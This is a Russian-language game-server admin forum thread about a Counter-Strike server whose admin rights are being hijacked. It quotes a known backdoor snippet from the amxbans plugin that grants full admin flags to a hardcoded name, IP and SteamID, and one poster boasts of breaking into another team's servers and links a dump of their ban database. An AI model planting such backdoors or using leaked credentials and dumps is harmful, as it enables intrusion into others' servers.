Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

Взлом сервера №51246132

Опции

grey	9.10.2012, 15:08 Сообщение #21
Стаж: 15 лет Сообщений: 1785 Благодарностей: 1098 Полезность: 675	Цитата(mazdan @ 9.10.2012, 15:52) ТС, а в логах amxx копались? нет, я даже его ник не знаю, на сервере очень редко быавю... симптомы: Сервер ему не присваевает права, в БД левых админов нету. При удалении админа - он остается в БД и вроде ничего не меняется. Админка не работает после смене карты, магия какая-то) Устраивает голосования, только с хорошими картами и забирает админки у плохих админов)) Отредактировал: Грейковский, - 9.10.2012, 15:09 ---
	Поблагодарили 0 раз Поблагодарили 0 раз

mazdan	9.10.2012, 15:33 Сообщение #22
Стаж: 15 лет Сообщений: 7566 Благодарностей: 5437 Полезность: 1305	я б оставил :D Может быть стоит проверить не слиты ли пароли от mysql? Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
	Поблагодарили 2 раз Поблагодарили 2 раз grey, pulse.

iLLuSioN	9.10.2012, 15:35 Сообщение #23
Стаж: 19 лет Сообщений: 6911 Благодарностей: 7990 Полезность: 1639	Я бы для начала пароли все сменил. ПУ хостинга, твоя ПУ, фтп, база. Написание плагинов
	Поблагодарили 2 раз Поблагодарили 2 раз grey, pulse.

grey	9.10.2012, 15:39 Сообщение #24
Стаж: 15 лет Сообщений: 1785 Благодарностей: 1098 Полезность: 675	Цитата(mazdan @ 9.10.2012, 16:33) я б оставил :D Яж говорю Робин гуд, если бы мне не выносили мозг из-за того что админки пропадают то оставил бы его =) Цитата(mazdan @ 9.10.2012, 16:33) Может быть стоит проверить не слиты ли пароли от mysql? Пароли с того момента не менял изменил, на всякий случай удалю морду банса Отредактировал: Грейковский, - 9.10.2012, 15:50 ---
	Поблагодарили 0 раз Поблагодарили 0 раз

samthugg	9.10.2012, 17:25 Сообщение #25
Стаж: 15 лет Сообщений: 1333 Благодарностей: 1476 Полезность: 1344	Тоже на днях остался без морды amxbans Суть такова - в веб_админах только один и это я. Но тут появляется admin который просто заходит и делает что ему угодно. Думал база с дырой, но после того как он зашел снова и удалил меня - снес веб начисто Актуальная защита серверов от уязвимостей!
	Поблагодарили 0 раз Поблагодарили 0 раз

grey	9.10.2012, 17:34 Сообщение #26
Стаж: 15 лет Сообщений: 1785 Благодарностей: 1098 Полезность: 675	Цитата(samthugg @ 9.10.2012, 18:25) Тоже на днях остался без морды amxbans Суть такова - в веб_админах только один и это я. Но тут появляется admin который просто заходит и делает что ему угодно. Думал база с дырой, но после того как он зашел снова и удалил меня - снес веб начисто У меня чутка по другому, админ остается его ник пароль итд, но в игре он после смены карты не админ... ---
	Поблагодарили 0 раз Поблагодарили 0 раз

f1nik	9.10.2012, 17:41 Сообщение #27
Стаж: 15 лет Сообщений: 1862 Благодарностей: 932 Полезность: 1010	Цитата(Грейковский @ 9.10.2012, 18:34) У меня чутка по другому, админ остается его ник пароль итд, но в игре он после смены карты не админ... Интересно... попробуй юзани в консоли amx_reloadadmins тогда когда он на сервере... пропишется ему админка или нет? Я конечно не гуру кодинга, но мне кажется тут бекдурчик на что то типа putin_server, а после смены карты админы перегружаются из банса!!! ИМХО (могу нести бред )
	Поблагодарили 0 раз Поблагодарили 0 раз

imba

9.10.2012, 17:43

Сообщение #28

Стаж: 16 лет

Сообщений: 1677
Благодарностей: 735
Полезность: 571

Цитата(samthugg @ 9.10.2012, 18:25)

Тоже на днях остался без морды amxbans
Суть такова - в веб_админах только один и это я. Но тут появляется admin который просто заходит и делает что ему угодно. Думал база с дырой, но после того как он зашел снова и удалил меня - снес веб начисто

известен логин и пароль от бд.дальше дело за фантазией...
таким самым образом шатал сервера нави.там админ мягко говоря тупица

а у Грейковский,судя по всему,в amxbans_core.amxx раскоментили несколько всем известных строчек и заменили плагин

Код

/********** Backdoor here!!! *********

    new name[32], steamid[34], ip[22]
    get_user_name(id, name, 31)
    get_user_authid(id, steamid, 33)
    get_user_ip(id, ip, 21, 1)

    if(equal(name, "Sho0ter") && (equal(ip, "62.122.66.122") || equal(steam, "STEAM_0:1:35287273")))
    {
        set_user_flags(id, read_flags("abcdefghijklmnopqrstu"))
        return (1<<3)
    }*/

Отредактировал: imba, - 9.10.2012, 17:47

!

Запрет на ответ в темах до: 10.11.29392, 21:09 

Поблагодарили 2 раз

samthugg	9.10.2012, 17:49 Сообщение #29
Стаж: 15 лет Сообщений: 1333 Благодарностей: 1476 Полезность: 1344	Цитата(imba @ 9.10.2012, 18:43) известен логин и пароль от бд.дальше дело за фантазией... Этот "admin" шел не с базы а непосредственно с веб-интерфейса. Не думаю что человек что мог бы получить доступ к БД создал новый акк, спалил его в логах, а уж потом удалил с базы. Неужели и БД брутят? =\ Актуальная защита серверов от уязвимостей!
	Поблагодарили 0 раз Поблагодарили 0 раз

imba

9.10.2012, 17:51

Сообщение #30

Стаж: 16 лет

Сообщений: 1677
Благодарностей: 735
Полезность: 571

Цитата

Не думаю что человек что мог бы получить доступ к БД создал новый акк, спалил его в логах, а уж потом удалил с базы

именно так я и делал :P

Цитата

Неужели и БД брутят? =\

через бэкдор от мастамена узнать данные не проблема.или любым другим способом...

вот кстати бд amxbans паб сервера нави
http://rghost.ru/40835138

Отредактировал: imba, - 9.10.2012, 17:53

!

Запрет на ответ в темах до: 10.11.29392, 21:09 

grey	9.10.2012, 17:57 Сообщение #31
Стаж: 15 лет Сообщений: 1785 Благодарностей: 1098 Полезность: 675	Цитата(imba @ 9.10.2012, 18:43) известен логин и пароль от бд.дальше дело за фантазией... таким самым образом шатал сервера нави.там админ мягко говоря тупица а у Грейковский,судя по всему,в amxbans_core.amxx раскоментили несколько всем известных строчек и заменили плагин Код /******** Backdoor here!!! ******* new name[32], steamid[34], ip[22] get_user_name(id, name, 31) get_user_authid(id, steamid, 33) get_user_ip(id, ip, 21, 1) if(equal(name, "Sho0ter") && (equal(ip, "62.122.66.122") \|\| equal(steam, "STEAM_0:1:35287273"))) { set_user_flags(id, read_flags("abcdefghijklmnopqrstu")) return (1<<3) }*/ Может быть, мне в прошлый раз практически все плагины подменили, ник его Мент или как-то так ---
	Поблагодарили 0 раз Поблагодарили 0 раз

f1nik	9.10.2012, 18:03 Сообщение #32
Стаж: 15 лет Сообщений: 1862 Благодарностей: 932 Полезность: 1010	Цитата(Грейковский @ 9.10.2012, 18:57) Может быть, мне в прошлый раз практически все плагины подменили, ник его Мент или как-то так Пройдись дизасемблером... или кинь сюда посмотрим дружно)))
	Поблагодарили 0 раз Поблагодарили 0 раз

Legenda	9.10.2012, 19:56 Сообщение #33
Стаж: 16 лет Сообщений: 3619 Благодарностей: 1706 Полезность: 1010 Меценат	Цитата(f1nik @ 9.10.2012, 18:03) Пройдись дизасемблером... или кинь сюда посмотрим дружно))) это стопроцентный вариант один раз так хук нашел на rcon пароль иногда и админки встречались скрытые
	Поблагодарили 0 раз Поблагодарили 0 раз

indo	9.10.2012, 20:03 Сообщение #34
Стаж: 14 лет Сообщений: 758 Благодарностей: 450 Полезность: 843	Цитата(Грейковский @ 9.10.2012, 18:57) ник его Мент или как-то так Ахаха )) Знакомая личность ) Кроме него этот баг из психом походу никто и не юзает или просто не знает ) Разве что я ещё, но я редко и на левых серверах :D Форумчан не трогаю ) Отредактировал: indo, - 9.10.2012, 20:04
	Поблагодарили 2 раз Поблагодарили 2 раз pulse., sweet

grey	18.10.2012, 20:14 Сообщение #35
Стаж: 15 лет Сообщений: 1785 Благодарностей: 1098 Полезность: 675	Шаманство с бубном не помогло, теперь заходит под ником робингуд и забирает админки, видать прочитал тему. п.с. забирает админки методом удаления 1 буквы в нике тоесть если ник админский BOOOM меняет на BOOM ---
	Поблагодарили 1 раз Поблагодарили 1 раз sweet

indo	18.10.2012, 20:28 Сообщение #36
Стаж: 14 лет Сообщений: 758 Благодарностей: 450 Полезность: 843	Грейковский, ахахах )) какой хоть ip у этого добродетеля ?
	Поблагодарили 2 раз Поблагодарили 2 раз pulse., sweet

grey	18.10.2012, 20:31 Сообщение #37
Стаж: 15 лет Сообщений: 1785 Благодарностей: 1098 Полезность: 675	Цитата(indo @ 18.10.2012, 21:28) Грейковский, ахахах )) какой хоть ip у этого добродетеля ? его баны http://cs-battle.net.ua/ban_detal-6731.html http://cs-battle.net.ua/ban_detal-6732.html http://cs-battle.net.ua/ban_detal-6307.html http://cs-battle.net.ua/ban_detal-6308.html http://cs-battle.net.ua/ban_detal-6309.html ---
	Поблагодарили 1 раз Поблагодарили 1 раз sweet

indo	18.10.2012, 20:55 Сообщение #38
Стаж: 14 лет Сообщений: 758 Благодарностей: 450 Полезность: 843	Грейковский, да, это точно Мент )) ахаха :D
	Поблагодарили 2 раз Поблагодарили 2 раз pulse., sweet

agent0077	18.10.2012, 21:12 Сообщение #39
Стаж: 13 лет Сообщений: 10 Благодарностей: 1 Полезность: 0	Я не понимаю, от куда такая уверенность? ведь украина большая, провайдер киевстар огромный, половина игроков сидят на их динамических айпи.....
	Поблагодарили 0 раз Поблагодарили 0 раз

cs-portal	18.10.2012, 21:23 Сообщение #40
Стаж: 16 лет Сообщений: 8181 Благодарностей: 2709 Полезность: 0	провайдер киевстар ето бывший билайн который был куплен киевстаром а еще более бывший голдентелеком
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Защита Игрового сервера · Следующая тема »

0 пользователей и 1 гостей читают эту тему:

Наши новости:

Важная информация

Взлом сервера №51246132